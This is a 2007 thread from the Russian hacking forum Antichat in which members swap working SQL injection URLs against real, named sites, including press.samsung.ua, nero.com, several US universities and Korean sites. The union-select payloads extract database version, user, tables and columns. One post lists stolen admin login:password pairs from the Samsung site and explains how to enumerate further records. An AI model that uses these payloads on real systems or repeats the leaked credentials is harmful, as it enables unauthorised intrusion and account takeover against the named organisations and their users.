ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2951  
Старый 27.08.2007, 23:27
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

4 мускул код: http://www.press.try.md/print.php?iddb=Polit&id=-87829+union+select+1,concat(version(),user(),datab ase()),3,4,5,6,7,8/* чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_ schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян

Последний раз редактировалось fobofob; 28.08.2007 в 00:51.. Причина: Еще inj
 
Ответить с цитированием

  #2952  
Старый 28.08.2007, 01:23
Аватар для x.Elf
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

Цитата:
Сообщение от fobofob  
4 мускул код: http://www.press.try.md/print.php?iddb=Polit&id=-87829+union+select+1,concat(version(),user(),datab ase()),3,4,5,6,7,8/* чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_ schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян
Ты скажи: откуда в 4 мускуле бд information_schema
 
Ответить с цитированием

  #2953  
Старый 28.08.2007, 01:38
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Цитата:
Сообщение от x.Elf  
Ты скажи: откуда в 4 мускуле бд information_schema
в каком 4? Я про самсунг сказал,а там 5 мускул
 
Ответить с цитированием

  #2954  
Старый 28.08.2007, 01:46
Аватар для Nazaret2005
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
Talking

Цитата:
Сообщение от fobofob  
чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_ schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян
Admins
Цитата:
tim:1
anna:190184
siryks:cthutq
olga:imhappy
marina:SEU
ukraine:12345
kiryuha:magnus80
Visitor
Цитата:
LazMax:210683
Content
Цитата:
ph1:1
Medias
Цитата:
media:1
ss2:ss2
chip:samsung
Karman_in_ua:k-p4ssword
softpress:softpress
little:Rfpbyfrb
pfeffer:cydvb
Есть ещё много
Код:
http://press.samsung.ua/news/card.php?id=-1+union+select+1111,role,concat(login,char(58),passw)+from+user+where+id=22+limit+0,1/*
меняй id и вытаскивай данные

Как посмотреть какие есть таблицы и поля:

Код:
http://press.samsung.ua/news/card.php?id=-1+union+select+1,concat(column_name,char(58),table_name),3+from+information_schema.columns+limit+349,1/*
меняй limit , он будет показывать какие поля есть в таблице (Поле:Таблица)

Последний раз редактировалось Nazaret2005; 28.08.2007 в 02:20..
 
Ответить с цитированием

  #2955  
Старый 28.08.2007, 08:33
Аватар для 4nob1oz
4nob1oz
Познающий
Регистрация: 09.07.2007
Сообщений: 42
Провел на форуме:
88752

Репутация: 72
По умолчанию

nero.com

http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/*
 
Ответить с цитированием

  #2956  
Старый 28.08.2007, 08:36
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

utsa.edu - PR=7
Код:
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=@@version--
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20system_user)
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20db_name())

sju.edu - PR=7
Код:
http://www.sju.edu/hsb/campbell/research-guides/index-new2.php?subid=-1%20union%20select%201,2,3,4,5,6,7,8,version(),user(),11,12,13,database(),15,16,17/*

uprm.edu - PR=7
Код:
http://www.uprm.edu/library/cre/list_dbs.php?char=1'%20or%201=-1%20union%20select%201,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),0x71),0x71),3,4,5,6,7,8,9,10/*
 
Ответить с цитированием

  #2957  
Старый 28.08.2007, 14:26
Аватар для iRedX
iRedX
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642

Репутация: 46
Отправить сообщение для iRedX с помощью ICQ Отправить сообщение для iRedX с помощью MSN
По умолчанию

PR8

http://www.aiim.org/standards.asp?id=1+or+1=@@version--

Таблицы:
'vwWebGroups'
vwWebArticleTypes
vwActivePages
vwWebOrderDetails
vwForums
'vwWebModules'
'vwPollResults'
'vwIndustryEventTypes'
'vwForumPosts'
'vwWebUserActivity'
'vwIndustryEvents'
'vwPollQuestions'
'vwWebUsers'
vwChapDisplay
vwWebEntityConfigs
vwWebApplications
vwCompanies
vwChapAllList
vwWebEntityMatchPolicyItems
'vwIndustryEventPollIds'
'vwWebArticles'
vwWebEntityMatchPolicies
vwMarkets
'vwWebProducts'
'vwAIIMChapters
и тд.

но при запросе,
http://www.aiim.org/standards.asp?id=1+or+1=(select+top+1+RequestDoc1+ from+dbo.vwWebUsers)--

и при попытке использовать CMD выдается "The Querystring is invalid"
 
Ответить с цитированием

  #2958  
Старый 28.08.2007, 15:08
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.row-people.de/news/news.php?id=-1394+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,29+from+information_schema.tables/*
_4nob1oz - боян(
 
Ответить с цитированием

  #2959  
Старый 28.08.2007, 15:09
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Давно не выкладывал
Код:
http://www.topguard.co.kr/noticeboard/notice_view.php?number=-8+union+select+1,2,3,4,5,6,7,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),9,10,11,12,13,14,15,16,17/*
Старенькая БД
Код:
http://www.cleareyes.co.kr/itop20/gasa.php?number=-1+union+select+1,2,3,4,5,6,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),8,9,10,11,12,13

Последний раз редактировалось NOmeR1; 28.08.2007 в 15:11..
 
Ответить с цитированием

  #2960  
Старый 28.08.2007, 15:19
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Обновили антибоян, незабываем юзать.

http://filefront.jino-net.ru/sql.html
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ